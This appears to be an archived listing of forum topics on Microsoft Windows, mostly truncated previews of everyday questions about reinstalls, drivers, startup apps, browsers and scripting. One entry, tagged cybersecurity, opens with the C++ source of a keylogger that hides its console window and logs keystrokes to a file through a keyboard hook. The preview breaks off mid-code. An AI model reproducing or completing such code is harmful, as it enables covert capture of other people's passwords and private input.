19,440 Archived Topics
Remove Filter ![]() | |
![]() | My sister likes to bush buttons, any buttons, all buttons. As a result, I felt her computer could not be fixed. I reinstalled Windows 10 pro for her from an ISO I got from MS. I had to reinstall Windows within Windows. USB would not work. The installation went well. … Microsoft Windows windows-10 |
Hello. Can you tell me how to disable Teams from starting up while windows starts up? Thank you Microsoft Windows | |
Hello I have moved Windows 10 default created folders like "Documents", "Music", "Pictures" etc. to my E partition, and would like to know whether I can safely format the C partition and reinstall Windows without losing data in these folders, or do I need to backup all these folders again … Microsoft Windows hard-drive windows-10 | |
Hello all, So last night I decided to add an older HDD into my new desktop to... well add more storage since games now-a-days are HUGE, and I was running out on my current 2 drives (main SSD with Windows 10, and an HDD). I didn't realize that the older … Microsoft Windows storage video-card windows-10 windows-vista-7-8 | |
WIndows 11 is soon getting out. Are you planning to move to Windows 11? I like its features especially Snap Layouts. But I know it can be used on Windows 10. Which other Windows 11 can be used in Windows 10? Microsoft Windows microsoft windows-10 windows-11 | |
Hello. I'm tring to burn an ISO to a DVD (Windows 10 installation disc). But all the burning programs tell me that somethingis wrong, for example "Mediadetectie mislukt" which means "Media detection failed" and other programs keep the "burn" button gray. Is there something I can do? Microsoft Windows windows-10 | |
hi, I put a button to run the batch file and everything is fine But when the file works it asks for other files that are complete to run it and I did not know how to merge it together to work properly and these pictures    Microsoft Windows vb.net windows-10 | |
So I have a PC running windows 2000 that I need to take pictures off of, but the keyboard and mouse won’t work pass the bios. I’m pretty sure it wants me to install the drivers for them but I can’t exactly do that without a keyboard and mouse. Can … Microsoft Windows microsoft pc-peripheral | |
VB6 app developed on Win XP with DAO 3.6. Compiles and runs in XP with the db updating correctly. When app.exe file is copied to and run in Windows server 2012, the app runs and sees the incoming data but will not write to the mdb database. Any ideas?? Thanks. Microsoft Windows visual-basic windows-server windows-xp | |
I am using Win 10 pro 19043.1110. For some reason earlier this year, the right click /Eject option has gone missing for all my portable usb flash thumb drives showing on My Computer / This PC. It doesn't matter which front or rear ports the usb is connected to (usb2 … Microsoft Windows flash pc-peripheral storage | |
Hard to find this driver of dpskdops :( Anyone Have this driver please help me for my Capstone Project Microsoft Windows windows-10 | |
I am trying to convert an 11 page Pdf document to excel and have the formatting work correctly. If anyone knows of an easy way to do this I would appreciate it. Thank you, Microsoft Windows microsoft microsoft-office pdf windows-vista-7-8 | |
I've been trying to find a way to filter the Event Viewer in Windows by the description instead of the event type/source etc. I figure that i need to use the XML tab to customise it as there is no option in the basic filtering for what I want. One … Microsoft Windows | |
Hi, I am very new here, so I am not sure if it is the right place for my problem, but I will risk. I've already asked for help in a different section, but no one was able to answer my questions. I am trying to connect to Internet using … Microsoft Windows dns web-browser | |
So my MSI mpower z77 motherboard died 2 weeks ago. Last year I had cloned the drive from mechanical to ssd. This was also before i knew about sysprep methods. Didn't have much issues though with running windows 7. I'm not sure if I should use sysprep because I was … Microsoft Windows algorithm hard-drive windows-vista-7-8 | |
I already have mechanize but it said that I dont have the module name of mechanize what should I do? And is python Microsoft Windows microsoft microsoft-access python web-browser windows-10 | |
Hello. I have Windows 7 on a ThinkPad T500. I want to use my webcam. I disabled it once in the BIOS setup. But now I don't see how to enable it again. Help, please Leon Microsoft Windows webcam windows-vista-7-8 | |
my hp starts with 2 beeps 5 times, and nothing on screen but I hear It is look like working Microsoft Windows laptop windows-10 | |
I recently installed Windows ten in an older Toshiba Satellite P755=S5182 laptop. I have done this installation many times before and thought I had turned off most of the annoyances. I installed drivers and updates and a few programs ie, Chome , Acrobat Reader, etc. When I insert a USB … Microsoft Windows microsoft | |
I want to make a reg file to automatically change the key KMD_EnableBrightnessInterface2 from 1 to 0 in the following string. This way I can use it on another computer. HKEY_LOCAL_MACHINE \ SYSTEM \ ControlSet001 \ Control\Class \ {4d36e968-e325-11ce-bfc1-08002be10318} \ 0000 \KMD_EnableBrightnessInterface2 The folder 0000 contains many key values. I … Microsoft Windows | |
I have scores of entries in Chrome "Settings" / "Passwords" . When I go to from "Settings" / "Passwords" to the "google account" link Password Manager, the list is a lot shorter. A bit of background. When I switched my email from Freeserve to Gmail I also started using Outlook … Microsoft Windows windows-10 | |
I am creating a hangman game for my school summative. However I have been experiencing some difficulties with one of my methods called Random Words which performs a few tasks for my program including: - Generates a random word from a file which contains 6 different words - **Does not … Microsoft Windows laptop windows-10 | |
Petya loves lucky numbers. Everybody knows that lucky numbers are positive integers whose decimal representation contains only the lucky digits 4 and 7. For example, numbers 47, 744, 4 are lucky and 5, 17, 467 are not. Petya has a number consisting of n digits without leading zeroes. He represented … Microsoft Windows c++ microsoft-access web-browser windows-10 windows-vista-7-8 | |
Using edge browser lately and I noticed it doesn't take up that much of memory when running it than google chrome. How about you guys? what are your thoughts about the edge update? Microsoft Windows windows-10 | |
So I recently purchased 2 5k2k monitors to improve workflow for game development. I noticed once I run both displays the GPU gets hot and eventually the display goes black and the GPU fans go crazy. I also noticed that before that happens the GPU fans do not turn on … | |
So I have this 1TB external hard drive that I use for my games. It was working fine uptill about a week ago. I opened my laptop like normal, it did its startup stuff and everything was looking good untill I went to play DOOM Eternal. An error poped up … Microsoft Windows hard-drive storage | |
Dear all I'm trying to track down the name/existence of software that I used in 1999 to 'write' a financial reporting system - it was a curious mix of spreadsheet with programming capability... Would any of you know about this? Its name was similar (-ish) to Visual Basic, but it … Microsoft Windows cloud-computing visual-basic | |
What is file shredder and does Windows 10 have a file shredder or we need to download some third party software? Microsoft Windows windows-10 | |
#define _WIN32_WINNT 0x0500 #include<fstream> #include<windows.h> #include<winuser.h> using namespace std; void stealth(){ HWND stealth; AllocConsole(); stealth = FindWindowA("ConsoleWindowClass",NULL); ShowWindow(stealth,0); } ofstream out("keys.txt", ios::out); LRESULT CALLBACK keyboardHookProc(int nCode, WPARAM wParam, LPARAM lParam) { PKBDLLHOOKSTRUCT p = (PKBDLLHOOKSTRUCT) (lParam); // If key is being pressed if (wParam == WM_KEYDOWN) { switch (p->vkCode) { … Microsoft Windows cybersecurity ios | |
After my desktop computer was updated in March 2020 (Win 10 home automatic update), it lost the ability to communicate with my home network. The network is detectable and functions properly with my laptop --it's only the desktop computer that can't detect or connect to the network. I\ve tried many … Microsoft Windows printer windows-10 | |
Ok this is a weird one and its been ongoing for many months, wondering if anyone has any ideas. We have 10-15 office 365 exchange email accounts and they all work perfectly fine apart from one account on one device. This particular account has intermittent issues with sending and emails … Microsoft Windows microsoft microsoft-office windows-10 | |
I am looking for a screen accountability software. Can anyone recommend me a good software? Microsoft Windows | |
I woke up this morning and only half of my computer screen is up the other half has the "start" icon and the address bars that show what programs that I have running, it also has the time and date. My daughter was playing Webkinz last night, as she always … Microsoft Windows windows-nt-2000-xp | |
My machine has been infected with the golden palace casino trojan. I am unable to remove and was wondering if anyone had any ideas on how to remove it. Thanks:sad: Microsoft Windows web-browser | |
I know I'm properly connected to the internet and there aren't any problems there however everytime I try to log in to my hotmail account an error page shows up saying this page cannot be displayed. No matter how many times I try to log in the error page always … Microsoft Windows web-browser | |
Hi Good Evening All, Hope all are fine during this current situation. Currently i am facinf some issue after sudden power shut the HP Z840 Workstation is not loading the operating system i tried following: 1. Tried to repair the OS but in the repair screen no OS to select. … Microsoft Windows microsoft operating-system windows-server | |
Is anyone trying or using the new version of Windows "ar_windows_10_consumer_editions_version_2004_x64" I have a copy and I want to experience with you before I use it Microsoft Windows microsoft | |
I was trying to upgrade to windows 10 from windows 7 ultimate. But when the setup completes installing windows 10 and it restarts nothing happens and my previous window 7 starts again. Like nothing happened. Neither any drive space is eaten up after the install. I know if i clean … Microsoft Windows laptop microsoft windows-10 windows-vista-7-8 | |
How to Update Database Datetime in This Format " dd MMM yyyy HH:mm:ss 'GMT' "With Vb.net Program I Searched a lot about how to Get The Time online and i found a solution You will found it in my Codes. > My Aim is to make a MemberShip DateTime , … Microsoft Windows client-server data-structure vb.net | |
Please I currently need a quick answer on how I can uninstall windows 10 Microsoft Windows laptop windows-10 | |
I recently reinstalled Windows 10 on my laptop, since then it has been randomy not sleeping properly. After I had shut the lid of the laptop, I'd come back and find the laptop was 'on', as in the fan was running very quietly, the power lights and hard drive lights … Microsoft Windows laptop windows-10 | |
which is better firefox or chrome? Microsoft Windows microsoft web-browser windows-10 | |
    Hi, My windows 7 laptop died due to some reason yesterday won't start so I took the hardisk out and made an external drive, atleast everything in the drive and desktop etc all accessable apart from these files / one folder which I really need the … Microsoft Windows | |
[name deted by moderator] has a paypal account and been using my sunrise debit bank card to make transactions that are not approved by me Microsoft Windows | |
why, on windows 10, some touchpad drivers(even updated by windows) don't activate the vertical\horizontal scrool move.... i have them activated, but don't work.... when i use the finger, instead scrool, the move moves.. yes i have seen the scrool area. how can i fix the problem? Microsoft Windows windows-10 | |
I have 2 share folders \\testing\test1 which contain sub folders sub1,sub2,sub3,sub4,sub5 and \\testing\test2 which contain sub folders sub2,sub3 Need to know how to create a batch file on notepad to verify existance of sub folders from test1 and create them on test2 only if they do not exist in test … Microsoft Windows | |
I posted a question last week on Microsoft Technet and during the resulting discussion the following was posted: >VBScript will be gone in the next version of Windows. Almost all references to VBScript have disappeared from MS sites. In all the columns I've read about what's new and what's being … Microsoft Windows vbscript | |
Hi. I have recently a problem to access to sites https in all browsers. In the past I had a similar situation and that the problem was solved by removing Bytedefender. Now, I have no antivirus, Windows security only, and there is an app called Lenovo VANTAGE in which the … Microsoft Windows http-protocol router-proxy-firewall windows-10 | |
![]() | I don't like the way my Win10 file search results are displayed and I can't find out how to change the settings. I've made changes to the 'Sort by' and 'Group by' options but can't seem to get the results I want. An example: I type a search word in … Microsoft Windows display file-system seo windows-10 ![]() |
There can various actions that take us to the cause of Data Loss, **Intentional Action** *Intentional deletion of a file or program* **Unintentional Action** *Accidental deletion of a file or program Misplacement of CDs or Memory sticks Administration errors Inability to read unknown file format* I really found this Wiki … Microsoft Windows cybersecurity windows-vista-7-8 |
The End.